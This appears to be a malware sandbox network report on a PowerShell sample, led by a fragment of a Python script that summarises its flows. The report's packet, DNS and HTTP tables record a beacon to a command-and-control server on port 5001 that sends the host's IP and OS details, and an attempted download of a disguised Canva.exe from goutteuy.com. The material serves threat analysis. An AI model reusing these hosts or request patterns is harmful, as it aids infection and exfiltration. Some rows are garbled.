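# Constructed input: a subset of the report's packet timeline, columns space-separated.
PACKETS_TXT = """\
Feb 18, 2025 08:25:57.841998100 CET 49699 80 192.168.2.7 104.26.12.205
Feb 18, 2025 08:25:57.848089933 CET 80 49699 104.26.12.205 192.168.2.7
Feb 18, 2025 08:25:59.616442919 CET 49700 5001 192.168.2.7 91.206.178.120
Feb 18, 2025 08:25:59.621481895 CET 5001 49700 91.206.178.120 192.168.2.7
Feb 18, 2025 08:26:00.772011995 CET 5001 49700 91.206.178.120 192.168.2.7
Feb 18, 2025 08:26:00.844290972 CET 49701 443 192.168.2.7 185.211.7.193
Feb 18, 2025 08:26:01.542763948 CET 443 49701 185.211.7.193 192.168.2.7
Feb 18, 2025 08:26:02.035783052 CET 49702 443 192.168.2.7 104.18.11.207
Feb 18, 2025 08:26:02.361784935 CET 49705 5001 192.168.2.7 91.206.178.120
Feb 18, 2025 08:26:02.366764069 CET 5001 49705 91.206.178.120 192.168.2.7
"""

PACKET_RE = re.compile(
    r"^([A-Za-z]{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) CET (\d+) (\d+) (\S+) (\S+)$")

def parse_alerts(text):
    alerts = []
    for line in filter(None, text.splitlines()):
        ts, sid, sig, sev, src, sport, dst, dport, _proto = line.split("|")
        alerts.append(Alert(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
                            int(sid), sig, int(sev), src, int(sport), dst, int(dport)))
    return alerts

def parse_packets(text):
    packets = []
    for m in filter(None, map(PACKET_RE.match, (l.strip() for l in text.splitlines()))):
        stamp, frac, sport, dport, src, dst = m.groups()
        # the report has nanosecond precision; datetime stops at microseconds
        ts = datetime.strptime(stamp, "%b %d, %Y %H:%M:%S").replace(
            microsecond=int(frac[:6].ljust(6, "0")), tzinfo=CET)
        packets.append(Packet(ts, int(sport), int(dport), src, dst))
    return packets

def summarize(alerts, packets):
    """Group traffic by remote (ip, port), in the order the VM first contacted each."""
    flows = OrderedDict()
    for p in sorted(packets, key=lambda p: p.ts):
        if p.src == SANDBOX_HOST:
            key, direction, cport = (p.dst, p.dport), "out", p.sport
        elif p.dst == SANDBOX_HOST:
            key, direction, cport = (p.src, p.sport), "in", p.dport
        else:
            continue                      # not the VM's traffic
        f = flows.setdefault(key, {"first_seen": p.ts, "out": 0, "in": 0,
                                   "client_ports": set(), "alerts": [],
                                   "nonstandard_port": key[1] not in STANDARD_PORTS})
        f[direction] += 1
        f["client_ports"].add(cport)      # distinct client ports = distinct TCP sessions
    for a in alerts:                      # attach each alert to the endpoint it concerns
        key = (a.dst, a.dport) if a.src == SANDBOX_HOST else (a.src, a.sport)
        if key in flows:
            flows[key]["alerts"].append((a.severity, a.sid, a.signature))
    return flows

def suspicious(flows):
    """Endpoints on a non-standard port or carrying a severity-1 alert."""
    return [k for k, f in flows.items()
            if f["nonstandard_port"] or any(sev == 1 for sev, _, _ in f["alerts"])]

if __name__ == "__main__":
    flows = summarize(parse_alerts(ALERTS_TXT), parse_packets(PACKETS_TXT))
    for (ip, port), f in flows.items():
        flag = "  <-- non-standard port" if f["nonstandard_port"] else ""
        print(f"{ip}:{port} sessions={len(f['client_ports'])} out={f['out']} in={f['in']}{flag}")
        for sev, sid, sig in sorted(f["alerts"]):
            print(f"    sev{sev} sid{sid} {sig}")
    print("suspicious:", suspicious(flows))
```

Counting distinct client ports per endpoint is what separates one long session from repeated beacons: 91.206.178.120:5001 shows up twice (ports 49700 and 49705), once for the check-in and once for the later downloader-pattern request, which is the "known protocol on a non-standard port" behaviour the signature list above calls out and the cheapest thing to alert on in a network log (HTTP from powershell.exe to a non-web port).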
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 18, 2025 08:25:57.841998100 CET | 49699 | 80 | 192.168.2.7 | 104.26.12.205
Feb 18, 2025 08:25:57.848089933 CET | 80 | 49699 | 104.26.12.205 | 192.168.2.7
Feb 18, 2025 08:25:57.848176956 CET | 49699 | 80 | 192.168.2.7 | 104.26.12.205
Feb 18, 2025 08:25:57.849359989 CET | 49699 | 80 | 192.168.2.7 | 104.26.12.205
Feb 18, 2025 08:25:57.854161978 CET | 80 | 49699 | 104.26.12.205 | 192.168.2.7
Feb 18, 2025 08:25:58.322365046 CET | 80 | 49699 | 104.26.12.205 | 192.168.2.7
Feb 18, 2025 08:25:58.366209030 CET | 49699 | 80 | 192.168.2.7 | 104.26.12.205
Feb 18, 2025 08:25:59.616442919 CET | 49700 | 5001 | 192.168.2.7 | 91.206.178.120
Feb 18, 2025 08:25:59.621481895 CET | 5001 | 49700 | 91.206.178.120 | 192.168.2.7
Feb 18, 2025 08:25:59.621572971 CET | 49700 | 5001 | 192.168.2.7 | 91.206.178.120
Feb 18, 2025 08:25:59.622049093 CET | 49700 | 5001 | 192.168.2.7 | 91.206.178.120
Feb 18, 2025 08:25:59.626944065 CET | 5001 | 49700 | 91.206.178.120 | 192.168.2.7
Feb 18, 2025 08:26:00.772011995 CET | 5001 | 49700 | 91.206.178.120 | 192.168.2.7
Feb 18, 2025 08:26:00.781971931 CET | 5001 | 49700 | 91.206.178.120 | 192.168.2.7
Feb 18, 2025 08:26:00.782058954 CET | 49700 | 5001 | 192.168.2.7 | 91.206.178.120
Feb 18, 2025 08:26:00.782066107 CET | 5001 | 49700 | 91.206.178.120 | 192.168.2.7
Feb 18, 2025 08:26:00.782155991 CET | 49700 | 5001 | 192.168.2.7 | 91.206.178.120
Feb 18, 2025 08:26:00.795588970 CET | 49700 | 5001 | 192.168.2.7 | 91.206.178.120
Feb 18, 2025 08:26:00.800442934 CET | 5001 | 49700 | 91.206.178.120 | 192.168.2.7
Feb 18, 2025 08:26:00.844290972 CET | 49701 | 443 | 192.168.2.7 | 185.211.7.193
Feb 18, 2025 08:26:00.844342947 CET | 443 | 49701 | 185.211.7.193 | 192.168.2.7
Feb 18, 2025 08:26:00.844444990 CET | 49701 | 443 | 192.168.2.7 | 185.211.7.193
Feb 18, 2025 08:26:00.852996111 CET | 49701 | 443 | 192.168.2.7 | 185.211.7.193
Feb 18, 2025 08:26:00.853018045 CET | 443 | 49701 | 185.211.7.193 | 192.168.2.7
Feb 18, 2025 08:26:01.542763948 CET | 443 | 49701 | 185.211.7.193 | 192.168.2.7
Feb 18, 2025 08:26:01.542877913 CET | 49701 | 443 | 192.168.2.7 | 185.211.7.193
Feb 18, 2025 08:26:01.629965067 CET | 49701 | 443 | 192.168.2.7 | 185.211.7.193
Feb 18, 2025 08:26:01.630008936 CET | 443 | 49701 | 185.211.7.193 | 192.168.2.7
Feb 18, 2025 08:26:01.631030083 CET | 443 | 49701 | 185.211.7.193 | 192.168.2.7
Feb 18, 2025 08:26:01.678822994 CET | 49701 | 443 | 192.168.2.7 | 185.211.7.193
Feb 18, 2025 08:26:01.688014030 CET | 49701 | 443 | 192.168.2.7 | 185.211.7.193
Feb 18, 2025 08:26:01.735335112 CET | 443 | 49701 | 185.211.7.193 | 192.168.2.7
Feb 18, 2025 08:26:01.893752098 CET | 443 | 49701 | 185.211.7.193 | 192.168.2.7
Feb 18, 2025 08:26:01.893868923 CET | 443 | 49701 | 185.211.7.193 | 192.168.2.7
Feb 18, 2025 08:26:01.894263029 CET | 49701 | 443 | 192.168.2.7 | 185.211.7.193
Feb 18, 2025 08:26:01.894330978 CET | 443 | 49701 | 185.211.7.193 | 192.168.2.7
Feb 18, 2025 08:26:01.894687891 CET | 443 | 49701 | 185.211.7.193 | 192.168.2.7
Feb 18, 2025 08:26:01.894758940 CET | 49701 | 443 | 192.168.2.7 | 185.211.7.193
Feb 18, 2025 08:26:01.898689985 CET | 49701 | 443 | 192.168.2.7 | 185.211.7.193
Feb 18, 2025 08:26:02.035783052 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.035835981 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.035911083 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.037242889 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.037262917 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.361784935 CET | 49705 | 5001 | 192.168.2.7 | 91.206.178.120
Feb 18, 2025 08:26:02.366764069 CET | 5001 | 49705 | 91.206.178.120 | 192.168.2.7
Feb 18, 2025 08:26:02.366858959 CET | 49705 | 5001 | 192.168.2.7 | 91.206.178.120
Feb 18, 2025 08:26:02.367400885 CET | 49705 | 5001 | 192.168.2.7 | 91.206.178.120
Feb 18, 2025 08:26:02.372248888 CET | 5001 | 49705 | 91.206.178.120 | 192.168.2.7
Feb 18, 2025 08:26:02.501418114 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.501503944 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.510756016 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.510792017 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.511089087 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.511363029 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.512420893 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.559341908 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.640691042 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.640734911 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.640770912 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.640798092 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.640805006 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.640829086 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.640851021 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.640861988 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.640870094 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.640875101 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.640903950 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.640908003 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.640980005 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.641170979 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.641216040 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.645348072 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.645400047 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.645404100 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.645423889 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.645438910 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.645454884 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.645458937 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.645502090 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.727947950 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728034973 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.728046894 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728059053 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728085041 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.728097916 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.728108883 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728162050 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728195906 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.728202105 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728279114 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.728317022 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728384972 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.728389978 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728421926 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.728604078 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728650093 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.728655100 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728703022 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
Feb 18, 2025 08:26:02.728707075 CET | 443 | 49702 | 104.18.11.207 | 192.168.2.7
Feb 18, 2025 08:26:02.728739977 CET | 49702 | 443 | 192.168.2.7 | 104.18.11.207
                                                Feb 18, 2025 08:26:02.728744984 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.728776932 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729106903 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729167938 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729208946 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729211092 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729219913 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729239941 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729254961 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729259014 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729290962 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729295015 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729326010 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.729331017 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.729377985 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.730050087 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.730096102 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.730104923 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.730146885 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.730150938 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.730186939 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.772048950 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.772120953 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.772156000 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.772195101 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.815452099 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.815527916 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.815558910 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.815588951 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.815607071 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.815639019 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.815660000 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.815680981 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816162109 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816200018 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816217899 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816229105 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816248894 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816265106 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816268921 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816301107 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816692114 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816725016 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816740036 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816747904 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.816777945 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.816792965 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.817297935 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.817341089 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.817367077 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.817377090 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.817411900 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.817461967 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.817490101 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.817537069 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.818249941 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.818294048 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.818444014 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.818480015 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.818494081 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.818502903 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.818520069 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.818538904 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.819190025 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.819240093 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.819369078 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.819425106 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.859548092 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.859628916 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.902978897 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903057098 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.903115988 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903162956 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.903187990 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903223991 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903259039 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.903275013 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903322935 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:02.903362989 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.904709101 CET49702443192.168.2.7104.18.11.207
                                                Feb 18, 2025 08:26:02.904727936 CET44349702104.18.11.207192.168.2.7
                                                Feb 18, 2025 08:26:03.051590919 CET50014970591.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:03.060940981 CET50014970591.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:03.060956955 CET50014970591.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:03.061005116 CET497055001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:03.061031103 CET497055001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:03.066149950 CET497055001192.168.2.791.206.178.120
                                                Feb 18, 2025 08:26:03.071980000 CET50014970591.206.178.120192.168.2.7
                                                Feb 18, 2025 08:26:03.358095884 CET4969980192.168.2.7104.26.12.205
                                                Feb 18, 2025 08:26:28.969561100 CET5764253192.168.2.7162.159.36.2
                                                Feb 18, 2025 08:26:28.974333048 CET5357642162.159.36.2192.168.2.7
                                                Feb 18, 2025 08:26:28.974451065 CET5764253192.168.2.7162.159.36.2
                                                Feb 18, 2025 08:26:28.979275942 CET5357642162.159.36.2192.168.2.7
                                                Feb 18, 2025 08:26:29.428610086 CET5764253192.168.2.7162.159.36.2
                                                Feb 18, 2025 08:26:29.433676004 CET5357642162.159.36.2192.168.2.7
                                                Feb 18, 2025 08:26:29.433747053 CET5764253192.168.2.7162.159.36.2
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 18, 2025 08:25:57.828140020 CET | 64511 | 53 | 192.168.2.7 | 1.1.1.1
Feb 18, 2025 08:25:57.835222006 CET | 53 | 64511 | 1.1.1.1 | 192.168.2.7
Feb 18, 2025 08:26:00.808561087 CET | 64310 | 53 | 192.168.2.7 | 1.1.1.1
Feb 18, 2025 08:26:00.843296051 CET | 53 | 64310 | 1.1.1.1 | 192.168.2.7
Feb 18, 2025 08:26:02.020291090 CET | 57926 | 53 | 192.168.2.7 | 1.1.1.1
Feb 18, 2025 08:26:02.027892113 CET | 53 | 57926 | 1.1.1.1 | 192.168.2.7
Feb 18, 2025 08:26:28.968992949 CET | 53 | 57484 | 162.159.36.2 | 192.168.2.7
Feb 18, 2025 08:26:29.437591076 CET | 63927 | 53 | 192.168.2.7 | 1.1.1.1
Feb 18, 2025 08:26:29.445164919 CET | 53 | 63927 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 18, 2025 08:25:57.828140020 CET | 192.168.2.7 | 1.1.1.1 | 0x3aa0 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:26:00.808561087 CET | 192.168.2.7 | 1.1.1.1 | 0xb3df | Standard query (0) | goutteuy.com | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:26:02.020291090 CET | 192.168.2.7 | 1.1.1.1 | 0xa803 | Standard query (0) | maxcdn.bootstrapcdn.com | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:26:29.437591076 CET | 192.168.2.7 | 1.1.1.1 | 0x7692 | Standard query (0) | 241.42.69.40.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 18, 2025 08:25:57.835222006 CET | 1.1.1.1 | 192.168.2.7 | 0x3aa0 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:25:57.835222006 CET | 1.1.1.1 | 192.168.2.7 | 0x3aa0 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:25:57.835222006 CET | 1.1.1.1 | 192.168.2.7 | 0x3aa0 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:26:00.843296051 CET | 1.1.1.1 | 192.168.2.7 | 0xb3df | No error (0) | goutteuy.com | | 185.211.7.193 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:26:02.027892113 CET | 1.1.1.1 | 192.168.2.7 | 0xa803 | No error (0) | maxcdn.bootstrapcdn.com | | 104.18.11.207 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:26:02.027892113 CET | 1.1.1.1 | 192.168.2.7 | 0xa803 | No error (0) | maxcdn.bootstrapcdn.com | | 104.18.10.207 | A (IP address) | IN (0x0001) | false
Feb 18, 2025 08:26:29.445164919 CET | 1.1.1.1 | 192.168.2.7 | 0x7692 | Name error (3) | 241.42.69.40.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                                • goutteuy.com
                                                • maxcdn.bootstrapcdn.com
                                                • api.ipify.org
                                                • 91.206.178.120:5001
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 104.26.12.205 | 80 | 7236 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Feb 18, 2025 08:25:57.849359989 CET | 158 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
Feb 18, 2025 08:25:58.322365046 CET | 431 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 18 Feb 2025 07:25:58 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: keep-alive
                                                Vary: Origin
                                                cf-cache-status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 913c49472b507280-EWR
                                                server-timing: cfL4;desc="?proto=TCP&rtt=2349&min_rtt=2349&rtt_var=1174&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=158&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49700 | 91.206.178.120 | 5001 | 7236 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Feb 18, 2025 08:25:59.622049093 CET | 264 | OUT | GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                Host: 91.206.178.120:5001
                                                Connection: Keep-Alive
Feb 18, 2025 08:26:00.772011995 CET | 174 | IN | HTTP/1.1 200 OK
                                                Server: Werkzeug/3.1.3 Python/3.10.12
                                                Date: Tue, 18 Feb 2025 07:26:00 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 21
                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49705 | 91.206.178.120 | 5001 | 7236 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Feb 18, 2025 08:26:02.367400885 CET | 170 | OUT | GET /script_end?random_number=66350 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                Host: 91.206.178.120:5001
Feb 18, 2025 08:26:03.051590919 CET | 174 | IN | HTTP/1.1 200 OK
                                                Server: Werkzeug/3.1.3 Python/3.10.12
                                                Date: Tue, 18 Feb 2025 07:26:02 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 19
                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 185.211.7.193 | 443 | 7236 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-18 07:26:01 UTC | 206 | OUT | GET /wp-content/plugins/header-footer/images/Canva.exe HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                Host: goutteuy.com
                                                Connection: Keep-Alive
2025-02-18 07:26:01 UTC | 524 | IN | HTTP/1.1 404 Not Found
                                                Connection: close
                                                content-type: text/html
                                                last-modified: Fri, 07 Jan 2022 09:51:35 GMT
                                                etag: "999-61d80d27-4ab5739bf7ac3281;;;"
                                                accept-ranges: bytes
                                                content-length: 2457
                                                date: Tue, 18 Feb 2025 07:26:01 GMT
                                                server: LiteSpeed
                                                content-security-policy: upgrade-insecure-requests
                                                platform: hostinger
                                                panel: hpanel
                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
